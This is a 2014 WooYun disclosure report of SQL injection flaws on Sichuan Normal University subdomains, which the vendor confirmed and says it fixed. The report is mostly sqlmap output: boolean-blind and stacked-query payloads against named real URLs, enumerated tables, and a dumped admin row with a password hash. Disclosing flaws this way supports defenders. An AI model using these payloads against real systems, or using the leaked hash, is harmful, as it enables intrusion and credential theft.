当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076642

漏洞标题:四川师范大学某站sql注入(附赠其它分站14枚注入点)

相关厂商:sicnu.edu.cn

漏洞作者: 路人甲

提交时间:2014-09-21 20:55

修复时间:2014-09-25 10:46

公开时间:2014-09-25 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-21: 细节已通知厂商并且等待厂商处理中
2014-09-25: 厂商已经确认,细节仅向厂商公开
2014-09-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

四川师范大学sql注入(附赠其它分站14枚注入点)

详细说明:

0.http://gxy.sicnu.edu.cn
http://gxy.sicnu.edu.cn/Result.asp?BigClassName=0&keyword=11 (GET) keyword处

sqlmap identified the following injection points with a total of 82 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigClassName=0&keyword=11%' AND 1914=1914 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigClassName=0&keyword=11%' AND 1914=1914 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[4 tables]
+----------+
| admin    |
| bigclass |
| news     |
| system   |
+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigClassName=0&keyword=11%' AND 1914=1914 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[11 columns]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| author         | non-numeric |
| bigclassname   | non-numeric |
| content        | non-numeric |
| id             | numeric     |
| image          | numeric     |
| newsid         | numeric     |
| passwd         | non-numeric |
| smallclassname | non-numeric |
| specialid      | numeric     |
| title          | non-numeric |
| username       | non-numeric |
+----------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigClassName=0&keyword=11%' AND 1914=1914 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[1 entry]
+----+--------+-----------+-------+-----------+--------+------------------+---------+----------+----------+--------------+----------------+
| id | newsid | specialid | image | title     | author | passwd           | content | username | password | bigclassname | smallclassname |
+----+--------+-----------+-------+-----------+--------+------------------+---------+----------+----------+--------------+----------------+
| 73 | 969    | 0     | 工川师国新月师日普 | g      | e9a9d2f981b0b500 |


太慢,没跑完
1..http://cdyhm.sicnu.edu.cn
http://cdyhm.sicnu.edu.cn/show.asp?id=196 (GET)

qlmap identified the following injection points with a total of 82 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=196 AND 2671=2671
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


3.http://cs.sicnu.edu.cn
http://cs.sicnu.edu.cn/viewdoc.asp?id=9698 (GET)

sqlmap identified the following injection points with a total of 79 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9698 AND 4364=4364
---


4.http://spe.sicnu.edu.cn 搜索处注入
http://spe.sicnu.edu.cn:80/_rest/st/ajax_st_app_news.ashx (POST) action=ToSearchUrl&TabId=0&FolderId=&kw=

---
Place: POST
Parameter: kw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=ToSearchUrl&TabId=0&FolderId=&kw=1%' AND 2237=2237 AND '%'='
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: action=ToSearchUrl&TabId=0&FolderId=&kw=1%'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008


5.利用方法同4
http://smy.sicnu.edu.cn:80/_rest/st/ajax_st_app_news.ashx
http://nic.sicnu.edu.cn/ http://rsc.sicnu.edu.cn/ http://mba.sicnu.edu.cn/ http://kyc.sicnu.edu.cn/ http://hist.sicnu.edu.cn/ http://geo.sicnu.edu.cn/ http://fl.sicnu.edu.cn/ http://finearts.sicnu.edu.cn/ http://dance.sicnu.edu.cn/ http://card.sicnu.edu.cn/

漏洞证明:

0.http://gxy.sicnu.edu.cn
http://gxy.sicnu.edu.cn/Result.asp?BigClassName=0&keyword=11 (GET) keyword处

sqlmap identified the following injection points with a total of 82 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigClassName=0&keyword=11%' AND 1914=1914 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigClassName=0&keyword=11%' AND 1914=1914 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[4 tables]
+----------+
| admin    |
| bigclass |
| news     |
| system   |
+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigClassName=0&keyword=11%' AND 1914=1914 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[11 columns]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| author         | non-numeric |
| bigclassname   | non-numeric |
| content        | non-numeric |
| id             | numeric     |
| image          | numeric     |
| newsid         | numeric     |
| passwd         | non-numeric |
| smallclassname | non-numeric |
| specialid      | numeric     |
| title          | non-numeric |
| username       | non-numeric |
+----------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BigClassName=0&keyword=11%' AND 1914=1914 AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[1 entry]
+----+--------+-----------+-------+-----------+--------+------------------+---------+----------+----------+--------------+----------------+
| id | newsid | specialid | image | title     | author | passwd           | content | username | password | bigclassname | smallclassname |
+----+--------+-----------+-------+-----------+--------+------------------+---------+----------+----------+--------------+----------------+
| 73 | 969    | 0     | 工川师国新月师日普 | g      | e9a9d2f981b0b500 |


太慢,没跑完
1..http://cdyhm.sicnu.edu.cn
http://cdyhm.sicnu.edu.cn/show.asp?id=196 (GET)

qlmap identified the following injection points with a total of 82 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=196 AND 2671=2671
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


3.http://cs.sicnu.edu.cn
http://cs.sicnu.edu.cn/viewdoc.asp?id=9698 (GET)

sqlmap identified the following injection points with a total of 79 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9698 AND 4364=4364
---


4.http://spe.sicnu.edu.cn 搜索处注入
http://spe.sicnu.edu.cn:80/_rest/st/ajax_st_app_news.ashx (POST) action=ToSearchUrl&TabId=0&FolderId=&kw=

---
Place: POST
Parameter: kw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=ToSearchUrl&TabId=0&FolderId=&kw=1%' AND 2237=2237 AND '%'='
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: action=ToSearchUrl&TabId=0&FolderId=&kw=1%'; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008


5.利用方法同4
http://smy.sicnu.edu.cn:80/_rest/st/ajax_st_app_news.ashx
http://nic.sicnu.edu.cn/ http://rsc.sicnu.edu.cn/ http://mba.sicnu.edu.cn/ http://kyc.sicnu.edu.cn/ http://hist.sicnu.edu.cn/ http://geo.sicnu.edu.cn/ http://fl.sicnu.edu.cn/ http://finearts.sicnu.edu.cn/ http://dance.sicnu.edu.cn/ http://card.sicnu.edu.cn/

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-09-25 10:40

厂商回复:

通过自查,http://未见异常。其他分站漏洞均已修复。谢谢支持!

最新状态:

2014-09-25:cs.sicnu.edu.cn自查未见异常

2014-09-25:漏洞均已修复。谢谢支持!

漏洞评价:

评论